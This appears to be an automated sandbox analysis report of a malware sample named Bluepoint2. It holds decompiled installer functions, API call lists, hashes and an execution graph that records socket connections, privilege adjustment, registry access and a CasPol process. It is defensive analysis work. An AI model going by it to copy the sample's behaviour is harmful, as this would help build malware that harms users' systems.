                                                                                                                                    0x713c1294
                                                                                                                                    0x713c129a
                                                                                                                                    0x713c129b
                                                                                                                                    0x00000000
                                                                                                                                    0x713c129b
                                                                                                                                    0x713c125b
                                                                                                                                    0x713c125e
                                                                                                                                    0x713c11bc
                                                                                                                                    0x713c11bf
                                                                                                                                    0x713c11c2
                                                                                                                                    0x713c11cb
                                                                                                                                    0x713c11d0
                                                                                                                                    0x00000000
                                                                                                                                    0x713c11d1
                                                                                                                                    0x713c1264
                                                                                                                                    0x713c1266
                                                                                                                                    0x713c11a2
                                                                                                                                    0x713c11a5
                                                                                                                                    0x713c11a8
                                                                                                                                    0x713c11b1
                                                                                                                                    0x00000000
                                                                                                                                    0x713c11b1
                                                                                                                                    0x713c1164
                                                                                                                                    0x713c1165
                                                                                                                                    0x713c1177
                                                                                                                                    0x713c1180
                                                                                                                                    0x713c1184
                                                                                                                                    0x713c118e
                                                                                                                                    0x713c1191
                                                                                                                                    0x713c1193
                                                                                                                                    0x713c1193
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1165
                                                                                                                                    0x713c1143
                                                                                                                                    0x713c1218
                                                                                                                                    0x713c121d
                                                                                                                                    0x713c1221
                                                                                                                                    0x713c1223
                                                                                                                                    0x713c122c
                                                                                                                                    0x713c122f
                                                                                                                                    0x713c1238
                                                                                                                                    0x713c123d
                                                                                                                                    0x713c123d
                                                                                                                                    0x713c1247
                                                                                                                                    0x713c124a
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1250
                                                                                                                                    0x713c1149
                                                                                                                                    0x713c114c
                                                                                                                                    0x713c11e9
                                                                                                                                    0x713c11ed
                                                                                                                                    0x713c11f7
                                                                                                                                    0x713c11fb
                                                                                                                                    0x713c1205
                                                                                                                                    0x713c120a
                                                                                                                                    0x713c1211
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1211
                                                                                                                                    0x713c1152
                                                                                                                                    0x713c1155
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c115b
                                                                                                                                    0x713c115e
                                                                                                                                    0x713c11b8
                                                                                                                                    0x00000000
                                                                                                                                    0x713c11b8
                                                                                                                                    0x713c1160
                                                                                                                                    0x713c1162
                                                                                                                                    0x713c119e
                                                                                                                                    0x00000000
                                                                                                                                    0x713c119e
                                                                                                                                    0x00000000
                                                                                                                                    0x713c12a1
                                                                                                                                    0x713c12a1
                                                                                                                                    0x713c12ab
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 713C1171
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 713C11E3
                                                                                                                                    • GlobalFree.KERNEL32 ref: 713C124A
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 713C129B
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 713C12B1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84129670690.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84129620684.00000000713C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84129732994.00000000713C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84129781776.00000000713C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_713c0000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                    • Opcode ID: 7d6f908fc414102c8aec32c61fa195b75b28f6e0b91824cdb59d36891f6a9ffe
                                                                                                                                    • Instruction ID: 5e8fbd836a05fd3ba95f9b9792cdadc451f0d4a2255245f06e916afa2e453ad2
                                                                                                                                    • Opcode Fuzzy Hash: 7d6f908fc414102c8aec32c61fa195b75b28f6e0b91824cdb59d36891f6a9ffe
                                                                                                                                    • Instruction Fuzzy Hash: 0851C0BAA04216DFE701CF69C844A267BFDFB49B19B10411AF946DB2D0EB34ED11DB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040668A("C:\Users\Arthur\AppData\Local\Temp\nsh937B.tmp", "C:\Users\Arthur\AppData\Local\Temp\nsh937B.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsh937B.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adf8 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E004065C8(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E00406239(_t31, _t31) >= 0) {
						_t14 = E0040620A(_t31, "C:\Users\Arthur\AppData\Local\Temp\nsh937B.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}












                                                                                                                                    0x0040263e
                                                                                                                                    0x0040263e
                                                                                                                                    0x0040263e
                                                                                                                                    0x00402643
                                                                                                                                    0x00402646
                                                                                                                                    0x00402649
                                                                                                                                    0x0040264e
                                                                                                                                    0x00402650
                                                                                                                                    0x00402670
                                                                                                                                    0x004026aa
                                                                                                                                    0x00402672
                                                                                                                                    0x00402674
                                                                                                                                    0x00402688
                                                                                                                                    0x00402695
                                                                                                                                    0x00402695
                                                                                                                                    0x00402652
                                                                                                                                    0x00402654
                                                                                                                                    0x00402659
                                                                                                                                    0x00402667
                                                                                                                                    0x0040266a
                                                                                                                                    0x004026af
                                                                                                                                    0x004026b2
                                                                                                                                    0x0040292e
                                                                                                                                    0x0040292e
                                                                                                                                    0x004026b8
                                                                                                                                    0x004026c1
                                                                                                                                    0x004026c3
                                                                                                                                    0x004026e2
                                                                                                                                    0x004015b4
                                                                                                                                    0x004015b6
                                                                                                                                    0x00000000
                                                                                                                                    0x004015bc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004026c3
                                                                                                                                    0x00402c2d
                                                                                                                                    0x00402c39

                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh937B.tmp\System.dll), ref: 00402695
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsh937B.tmp$C:\Users\user\AppData\Local\Temp\nsh937B.tmp\System.dll
                                                                                                                                    • API String ID: 1659193697-3947595307
                                                                                                                                    • Opcode ID: 4a9067d827a4b8c099a0c03f7ab0fb9ba25826a25fc5163b758c2c2faf7004e8
                                                                                                                                    • Instruction ID: f1e3379d491753f9d96dc3c217618d2e64da59e9cc8309568291ba5d2d488428
                                                                                                                                    • Opcode Fuzzy Hash: 4a9067d827a4b8c099a0c03f7ab0fb9ba25826a25fc5163b758c2c2faf7004e8
                                                                                                                                    • Instruction Fuzzy Hash: D511C472A00205EBCB10BBB18E4AA9E76619F44758F21483FE402B61C1DAFD8891965F
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00403C25() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2dc
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x2f4
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				return E00405D74(_t11, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\nsh937B.tmp", 7);
			}






                                                                                                                                    0x00403c25
                                                                                                                                    0x00403c34
                                                                                                                                    0x00403c37
                                                                                                                                    0x00403c39
                                                                                                                                    0x00403c39
                                                                                                                                    0x00403c40
                                                                                                                                    0x00403c48
                                                                                                                                    0x00403c4b
                                                                                                                                    0x00403c4d
                                                                                                                                    0x00403c4d
                                                                                                                                    0x00403c4d
                                                                                                                                    0x00403c54
                                                                                                                                    0x00403c66

                                                                                                                                    APIs
                                                                                                                                    • CloseHandle.KERNEL32(000002DC,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                                                                                                    • CloseHandle.KERNEL32(000002F4,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\nsh937B.tmp, xrefs: 00403C5B
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandle
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsh937B.tmp
                                                                                                                                    • API String ID: 2962429428-2662819654
                                                                                                                                    • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                                                                    • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                                                                                                    • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                                                                    • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                    			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                                                                                    0x0040604b
                                                                                                                                    0x00406056
                                                                                                                                    0x0040605a
                                                                                                                                    0x00406061
                                                                                                                                    0x0040606d
                                                                                                                                    0x0040607d
                                                                                                                                    0x0040607f
                                                                                                                                    0x00406097
                                                                                                                                    0x00406098
                                                                                                                                    0x0040609f
                                                                                                                                    0x004060a0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406083
                                                                                                                                    0x0040608a
                                                                                                                                    0x00406092
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040608a
                                                                                                                                    0x004060a2
                                                                                                                                    0x00000000
                                                                                                                                    0x004060b6
                                                                                                                                    0x0040606f
                                                                                                                                    0x00406075
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406075
                                                                                                                                    0x0040605c
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,77133420,?,77132EE0,00405D94,?,77133420,77132EE0,00000000), ref: 00405FF0
                                                                                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                                                                    • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,77133420,?,77132EE0,00405D94,?,77133420,77132EE0,00000000), ref: 00406098
                                                                                                                                    • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,77133420,?,77132EE0,00405D94,?,77133420,77132EE0), ref: 004060A8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                    • String ID: P_B
                                                                                                                                    • API String ID: 3248276644-906794629
                                                                                                                                    • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                                                                    • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                                                                                                    • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                                                                    • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                                                                    0x004060cd
                                                                                                                                    0x004060cf
                                                                                                                                    0x004060d2
                                                                                                                                    0x004060fe
                                                                                                                                    0x004060d7
                                                                                                                                    0x004060e0
                                                                                                                                    0x004060e5
                                                                                                                                    0x004060f0
                                                                                                                                    0x004060f3
                                                                                                                                    0x0040610f
                                                                                                                                    0x004060f5
                                                                                                                                    0x004060fc
                                                                                                                                    0x00000000
                                                                                                                                    0x004060fc
                                                                                                                                    0x00406108
                                                                                                                                    0x0040610c
                                                                                                                                    0x0040610c
                                                                                                                                    0x00406106
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060E5
                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                    • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                                                                    • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                                                                                    • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                                                                    • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:27.3%
                                                                                                                                    Dynamic/Decrypted Code Coverage:98.5%
                                                                                                                                    Signature Coverage:3%
                                                                                                                                    Total number of Nodes:135
                                                                                                                                    Total number of Limit Nodes:7
                                                                                                                                    execution_graph 37035 1d8ab50a 37036 1d8ab56c 37035->37036 37037 1d8ab536 OleInitialize 37035->37037 37036->37037 37038 1d8ab544 37037->37038 37039 20160c96 37041 20160ccb ReadFile 37039->37041 37042 20160cfd 37041->37042 37043 20160896 37044 201608e6 RegEnumKeyExW 37043->37044 37045 201608f4 37044->37045 37143 20162056 37144 2016208e OpenFileMappingW 37143->37144 37146 201620c9 37144->37146 37147 1d8aa54a 37148 1d8aa582 RegOpenKeyExW 37147->37148 37150 1d8aa5d8 37148->37150 37151 20162156 37152 2016218e MapViewOfFile 37151->37152 37154 201621dd 37152->37154 37155 20160bd6 37157 20160c0b GetFileType 37155->37157 37158 20160c38 37157->37158 37050 20710af0 37051 20710b14 LdrInitializeThunk 37050->37051 37053 20710b42 37051->37053 37159 201625d2 37161 20162607 GetProcessTimes 37159->37161 37162 20162639 37161->37162 37054 20162e9e 37055 20162ed3 WSAConnect 37054->37055 37057 20162ef2 37055->37057 37058 20161a9e 37059 20161ad6 WSASocketW 37058->37059 37061 20161b12 37059->37061 37062 1d8ab082 37065 1d8ab0ae GetFileAttributesExW 37062->37065 37064 1d8ab0ca 37065->37064 37163 1012249 TerminateThread 37164 10122a8 37163->37164 37066 1d8aa09a 37067 1d8aa0cf recv 37066->37067 37068 1d8aa107 37066->37068 37069 1d8aa0dd 37067->37069 37068->37067 37070 1d8aa89a 37071 1d8aa8c3 LookupPrivilegeValueW 37070->37071 37073 1d8aa8ea 37071->37073 37074 20162b06 37075 20162b3b WSAIoctl 37074->37075 37077 20162b89 37075->37077 37165 1d8aafda 37166 1d8ab00f NtQuerySystemInformation 37165->37166 37168 1d8ab03a 37165->37168 37167 1d8ab024 37166->37167 37168->37166 37169 201618c6 37172 201618fb GetNetworkParams 37169->37172 37171 2016192b 37172->37171 37078 20162502 37080 20162537 shutdown 37078->37080 37081 20162560 37080->37081 37082 1d8aae12 37083 1d8aae47 K32GetModuleInformation 37082->37083 37085 1d8aae7e 37083->37085 37173 20163f4e 37174 20163fc4 37173->37174 37175 20163f8c DuplicateHandle 37173->37175 37174->37175 37176 20163f9a 37175->37176 37177 1d8aa652 37178 1d8aa687 RegQueryValueExW 37177->37178 37180 1d8aa6db 37178->37180 37086 1d8ab396 37087 1d8ab3e6 MkParseDisplayName 37086->37087 37088 1d8ab3f4 37087->37088 37181 2016284a 37182 20162885 getaddrinfo 37181->37182 37184 201628f7 37182->37184 37185 20162dca 37186 20162dff GetAdaptersAddresses 37185->37186 37188 20162e38 37186->37188 37089 1d8aad2a 37092 1d8aad5f K32EnumProcessModules 37089->37092 37091 1d8aad8e 37092->37091 37093 20164832 37094 20164858 CreateDirectoryW 37093->37094 37096 2016487f 37094->37096 37189 201648f2 37191 2016491b CopyFileW 37189->37191 37192 20164942 37191->37192 37097 20162c3e 37098 20162c8e CertGetCertificateChain 37097->37098 37099 20162c96 37098->37099 37100 201649ba 37101 201649e0 DeleteFileW 37100->37101 37103 201649fc 37101->37103 37196 2016167a 37197 201616a6 GlobalMemoryStatusEx 37196->37197 37198 201616e5 37196->37198 37199 201616b4 37197->37199 37198->37197 37200 201623fa 37201 20162432 CreateMutexW 37200->37201 37203 20162475 37201->37203 37108 20161ea6 37109 20161ede ConvertStringSecurityDescriptorToSecurityDescriptorW 37108->37109 37111 20161f1f 37109->37111 37204 20162ce6 37205 20162d1b WSAEventSelect 37204->37205 37207 20162d52 37205->37207 37112 201606a2 37114 201606da CreateFileW 37112->37114 37115 20160729 37114->37115 37116 1d8abebe 37118 1d8abef9 LoadLibraryA 37116->37118 37119 1d8abf36 37118->37119 37120 20161ba2 37121 20161bda setsockopt 37120->37121 37122 20161c12 37120->37122 37123 20161be8 37121->37123 37122->37121 37124 201640ae 37127 201640d4 FindWindowW 37124->37127 37126 20164102 37127->37126 37128 1d8aaf32 37129 1d8aaf82 K32GetModuleBaseNameW 37128->37129 37130 1d8aaf8a 37129->37130 37208 1d8aa172 37209 1d8aa1c2 FindNextFileW 37208->37209 37210 1d8aa1ca 37209->37210 37131 20162a2a 37133 20162a5f ioctlsocket 37131->37133 37134 20162a8b 37133->37134 37135 1d8aa4b6 37136 1d8aa50b 37135->37136 37137 1d8aa4e2 SetErrorMode 37135->37137 37136->37137 37138 1d8aa4f7 37137->37138 37139 1d8aaab6 37140 1d8aaae5 AdjustTokenPrivileges 37139->37140 37142 1d8aab07 37140->37142

                                                                                                                                    Executed Functions

                                                                                                                                    Function 1FC5A2B8 Relevance: 8.7, Strings: 2, Instructions: 6210COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: d$d
                                                                                                                                    • API String ID: 0-195624457
                                                                                                                                    • Opcode ID: f68e96b033b2cde5b9a1b0822603da5af5b97c4673e06709569b488b56a4eaf5
                                                                                                                                    • Instruction ID: d144a403b0cb72be4b0f393b9d09e309f70c46f5342108546c6baa794a07e823
                                                                                                                                    • Opcode Fuzzy Hash: f68e96b033b2cde5b9a1b0822603da5af5b97c4673e06709569b488b56a4eaf5
                                                                                                                                    • Instruction Fuzzy Hash: 55C3B475D00A299FDB65CF69C840AC9BBF2BF89300F0585E5E50CAB221D771AE85DF41
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC5A2B3 Relevance: 8.1, Strings: 2, Instructions: 5589COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: d$d
                                                                                                                                    • API String ID: 0-195624457
                                                                                                                                    • Opcode ID: 7f7a2e06a392909b3ddb7899196aa8fe942253e39f276f8dd849475613d4c4d0
                                                                                                                                    • Instruction ID: 2fbf39a2323de095c53f87ee543caa6f96ecd4e5bd86a1bb0abc4eeb7b6023e5
                                                                                                                                    • Opcode Fuzzy Hash: 7f7a2e06a392909b3ddb7899196aa8fe942253e39f276f8dd849475613d4c4d0
                                                                                                                                    • Instruction Fuzzy Hash: A7B3A275D00A299FDB65CF68C844AC9BBF2BF89300F0585E5E90CAB221D771AE85DF41
                                                                                                                                    Uniqueness

